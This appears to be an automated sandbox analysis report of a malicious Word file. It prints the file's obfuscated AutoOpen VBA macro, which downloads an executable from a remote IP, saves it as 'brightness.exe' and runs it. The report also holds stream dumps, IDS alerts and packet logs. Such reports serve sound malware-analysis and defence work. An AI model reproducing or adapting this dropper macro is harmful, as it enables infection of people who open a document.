Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Title:
Subject:
Author:	GRACE
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	GRACE
Revion Number:	2
Total Edit Time:	60
Create Time:	2025-01-07 08:57:00
Last Saved Time:	2025-01-07 08:57:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 4808

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	4808
Data ASCII:	. . . . . . . . V . . . . . . . . . ] . . . . . . . . . . . . . . 8 . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h .
Data Raw:	01 16 01 00 01 f0 00 00 00 56 05 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 5d 05 00 00 81 0f 00 00 00 00 00 00 01 00 00 00 38 20 08 6e 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
 
Dim xHttp:
'this is a comment



Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")
'this is a comment
Dim bStrm:
'this is a comment
Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")



Dim nirm1
nirm1 = "h"
Dim nirm2
nirm2 = "t"
Dim nirm3
nirm3 = "t" & "p:/" & "/147.124.216.113/image"
Dim nirm4
nirm4 = "."
Dim nirm5
nirm5 = "e"
Dim nirm6
nirm6 = "x"
Dim nirm7
nirm7 = "e"



Dim plpl
plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

'this is a comment
xHttp.Open "GET", plpl, False
xHttp.Send




 
With bStrm
 .Type = 1
.Open
 .write xHttp.responsebody
 
 'this is a comment
 
Dim monu1
 monu1 = "brightness"
 Dim monu2
 monu2 = "."
 'this is a comment
 Dim monu3
 monu3 = "e"
 'this is a comment
 Dim monu4
 monu4 = "x"
 'this is a comment
 Dim monu5
 monu5 = "e"
 'this is a comment
 Dim monu6
 monu6 = monu1 & monu2 & monu3 & monu4 & monu5
 
 
 .savetofile monu6, 2


Dim parveen1
Dim parveen2
Dim parveen3
Dim parveen4
Dim praveen1
praveen1 = """brightness"
Dim praveen2
praveen2 = "."
'this is a comment
Dim praveen3
praveen3 = "e"
'this is a comment
Dim praveen4
praveen4 = "x"
'this is a comment
Dim praveen5
praveen5 = "e"""
'this is a comment



Dim praveen6
praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
 


End With
 
Shell (praveen6)
 
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.235956365095031
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.24379920956187054
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.46196969653588177
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G R A C E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7019

General
Stream Path:	1Table
CLSID:
File Type:	data
Stream Size:	7019
Entropy:	5.867058948447899
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: dBase III DBT, version number 0, next free block index 113648, 1st item "TRC", Stream Size: 113648

General
Stream Path:	Data
CLSID:
File Type:	dBase III DBT, version number 0, next free block index 113648, 1st item "TRC"
Stream Size:	113648
Entropy:	7.649737008358478
Base64 Encoded:	True
Data ASCII:	. . D . d . . . . . . . . . . . . . . . . . . . . . / = ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . s . . > . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . R . . , . . . . Z . . 7 J 2 9 ( . . . . . . . . D . . . . . . F . . . . Z . . 7 J 2 9 ( . . J F I F . . . . . . . . . I C C _ P R O F I L E . . . . . . . . . . . . . . . m n
Data Raw:	f0 bb 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 2f e0 3d 60 03 ca 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 70 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 73 00 0b f0 3e 00 00 00 7f 00 80 00 e1 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 372

General
Stream Path:	Macros/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	372
Entropy:	5.247850066443211
Base64 Encoded:	True
Data ASCII:	I D = " { D 4 8 8 9 9 2 A - D A 8 5 - 4 B 5 A - 9 B F 1 - 3 D A F D 4 9 5 8 A 0 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 E 1 C 1 1 2 9 1 1 2 9 1 7 2 D 1 7 2 D 1 7 2 D 1 7 2 D " . . D P B = " 2 0 2 2 2 F 3 0 3 0 3 0 3 0 3 0 " . . G C = " 2 2 2 0 2 D 2 D 2 E 2 E 2 E 2 E D 1 " . . . . [ H o s t E x t e n d e r I n f o ] . .
Data Raw:	49 44 3d 22 7b 44 34 38 38 39 39 32 41 2d 44 41 38 35 2d 34 42 35 41 2d 39 42 46 31 2d 33 44 41 46 44 34 39 35 38 41 30 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	Macros/PROJECTwm
CLSID:
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2910

General
Stream Path:	Macros/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2910
Entropy:	4.347263611919823
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
Data Raw:	cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522

General
Stream Path:	Macros/VBA/dir
CLSID:
File Type:	VAX-order 68k Blit mpx/mux executable
Stream Size:	522
Entropy:	6.254646838582843
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . 9 . i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . # m . . A ! O f f i c g O D . f . i . c g
Data Raw:	01 06 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 39 c8 8f 69 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	1.0819123923304879
Base64 Encoded:	False
Data ASCII:	. Y . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j [ [ . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . \\ 9 . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . 0 . . . . . . . . .
Data Raw:	ec a5 c1 00 59 e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 5b c9 5b c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 39 a3 0a 5c 39 a3 0a 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T13:25:17.212528+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49733	132.226.8.169	80	TCP
2025-01-07T13:25:19.602455+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49733	132.226.8.169	80	TCP
2025-01-07T13:25:20.204571+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49802	188.114.97.3	443	TCP
2025-01-07T13:25:23.336682+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49807	132.226.8.169	80	TCP
2025-01-07T13:25:25.601243+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49831	132.226.8.169	80	TCP
2025-01-07T13:25:26.078233+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49813	132.226.8.169	80	TCP
2025-01-07T13:25:26.189834+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49843	188.114.97.3	443	TCP
2025-01-07T13:25:27.143228+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49848	132.226.8.169	80	TCP
2025-01-07T13:25:29.296135+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49866	188.114.97.3	443	TCP
2025-01-07T13:25:30.116047+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49813	132.226.8.169	80	TCP
2025-01-07T13:25:30.300073+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49872	132.226.8.169	80	TCP
2025-01-07T13:25:30.506587+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49879	188.114.97.3	443	TCP
2025-01-07T13:25:31.350398+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49886	132.226.8.169	80	TCP
2025-01-07T13:25:31.522386+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49872	132.226.8.169	80	TCP
2025-01-07T13:25:32.098031+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49896	188.114.97.3	443	TCP
2025-01-07T13:25:33.569168+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49904	132.226.8.169	80	TCP
2025-01-07T13:25:33.925471+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49912	188.114.97.3	443	TCP
2025-01-07T13:25:34.061984+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49913	188.114.97.3	443	TCP
2025-01-07T13:25:34.145521+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49914	188.114.97.3	443	TCP
2025-01-07T13:25:34.976314+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49920	149.154.167.220	443	TCP
2025-01-07T13:25:40.157761+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49968	188.114.97.3	443	TCP
2025-01-07T13:25:42.243631+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49986	149.154.167.220	443	TCP
2025-01-07T13:25:42.997193+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49996	188.114.97.3	443	TCP
2025-01-07T13:25:43.911647+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	50001	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 13:24:59.336947918 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:24:59.341896057 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:24:59.342180014 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:24:59.342294931 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:24:59.348727942 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.667083979 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.667103052 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.667114019 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.667124987 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.667138100 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.667188883 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.667243004 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.703648090 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.703670025 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.703681946 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.703694105 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.703705072 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.703764915 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.703778982 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.703793049 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.703804016 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.703841925 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.703883886 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.753333092 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.753369093 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.753386021 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.753448963 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.753483057 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.753530025 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.753549099 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.753577948 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.753581047 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.753592968 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.753603935 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.753676891 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.754365921 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.754378080 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.754388094 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.754460096 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.794645071 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.794795990 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.794809103 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.794910908 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.794981003 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.794992924 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.795003891 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.795080900 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.795150995 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.795164108 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.795207024 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.795969009 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.795980930 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.795991898 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.796031952 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.796066999 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.796117067 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.796128988 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.796189070 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.796783924 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.796793938 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.796834946 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.842178106 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.842195034 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.842300892 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.842307091 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.842358112 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.842370987 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.842431068 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.842437029 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.842447996 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.842483997 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.843138933 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.843152046 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.843163013 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.843193054 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.843205929 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.843205929 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.843206882 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.843244076 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.844109058 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.844120979 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.844127893 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.844134092 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.844144106 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.844177961 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.844216108 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.844965935 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.844978094 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.844990015 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.845035076 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.845035076 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.882072926 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882091999 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882103920 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882179022 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.882232904 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882256031 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882276058 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882288933 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882302046 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882313013 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.882327080 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.882378101 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:00.882783890 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882823944 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:00.882836103 CET	80	49710	147.124.216.113	192.168.2.5
